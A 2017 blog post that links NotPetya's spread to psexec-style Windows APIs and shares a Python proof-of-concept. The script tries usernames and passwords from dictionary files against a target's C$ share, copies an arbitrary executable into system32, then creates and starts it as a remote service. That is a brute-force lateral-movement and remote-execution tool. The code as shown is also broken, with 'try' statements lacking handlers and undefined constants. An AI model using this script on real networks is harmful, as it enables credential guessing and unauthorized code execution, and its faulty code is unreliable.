Wednesday, July 5, 2017

Copy and execute file to remote machine like psexec with the Windows api

These days we have heard a lot about the new Petya (or NotPetya, EternalPetya, etc…) ransomware (or wiper). It propagates itself using the same exploit as WannaCry, eternalBlue. But the malware is using additional method to propagate itsefl. It enumerates local credentials and tries to login into remote machines with psexec for executing itself there. In this article I talk a bit about the Windows api that psexec is using for copying and executing files in a remote machine, and i share a PoC in python.

All the information shared here is not new, it is all well documented Windows apis.

If we take a quick look to psexec and we debug it a bit, we can see where are the main apis used for this purpose.

For connection to a share we need WNetAddConnection2W:

For create a remote service. Open SC Manager:

Create the service:

And start it:

here you can find a python source code for connecting a remote machine, copy a source executable, and create a service in the remote machine to run the copied executable:

# Author: Javier Vicente Vallejo, @vallejocc,
# With this script it is possible to connect a remote machine, copy an executable and execute remotely the copied executable.
# Parameters:
# python <ip target machine> <username | path to dictionary> <password | path to dictionary> <path to exe>
# If username is a path to a file, file lines are used as usernames (the script will try all the usernames. If it is not a file, the parameter is used as username.
# With password is the same behaviour, if password is a path to a file, file lines are used as passwords (the script will try all the passwords for all usernames). If it is not a file, the parameter is used as password.

import sys
import os
from win32wnet import WNetAddConnection2, WNetCancelConnection2, NETRESOURCE 
from win32service import CreateService, OpenSCManager, CloseServiceHandle, StartService, OpenService
import shutil
import time
import win32api


def get_used_drive_letters():
 drives = win32api.GetLogicalDriveStrings()
 drives = drives.split('\000')[:-1]
 letters = [d[0] for d in drives]
 return letters

def get_unused_drive_letters():
 alphabet = map(chr, range(ord('A'), ord('Z')+1))
 used = get_used_drive_letters()
 unused = list(set(alphabet)-set(used))
 return unused

def get_highest_unused_drive_letter():
 unused = get_unused_drive_letters()
 highest = list(reversed(sorted(unused)))[0]
 return highest


def dowork(paramtarget, paramusername, parampassword, paramsrcexe):

 localdrv = get_highest_unused_drive_letter()
 if not localdrv: return
 localdrv = localdrv + ":"
 print "Using localdrv %s" % localdrv
 resource = NETRESOURCE() 
 resource.lpRemoteName = r'\\%s\c$' % paramtarget
 resource.lpLocalName = localdrv
 username = paramusername
 password = parampassword
 print resource.lpRemoteName
 print resource.lpLocalName
 res = WNetAddConnection2(resource, Password=password, UserName=username) 
 try:shutil.copy(paramsrcexe, "%s\\windows\\system32\\mysvc.exe" % localdrv)
 try:scman = OpenSCManager(paramtarget, None, 0xF003F)
 try:hsrv = CreateService(scman, "MYSVC", "MYSVC", 0xF01FF, SERVICE_WIN32_OWN_PROCESS, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, "c:\\windows\\system32\\mysvc.exe", None, 0, None, None, None)
 except:hsrv = OpenService(scman, "MYSVC", 0xF01FF)
 try:StartService(hsrv, [""])
 WNetCancelConnection2(localdrv, 0, 0)

lusers = []
lpasswords = [] 
if os.path.isfile(sys.argv[2]):
 f = open(sys.argv[2], "r")
 lusers = map(str.strip, f.readlines())

if os.path.isfile(sys.argv[3]):
 f = open(sys.argv[3], "r")
 lpasswords = map(str.strip, f.readlines())

for u in lusers:
 for p in lpasswords:
  print "Trying %s %s" % (u, p)
  dowork(sys.argv[1], u, p, sys.argv[4])

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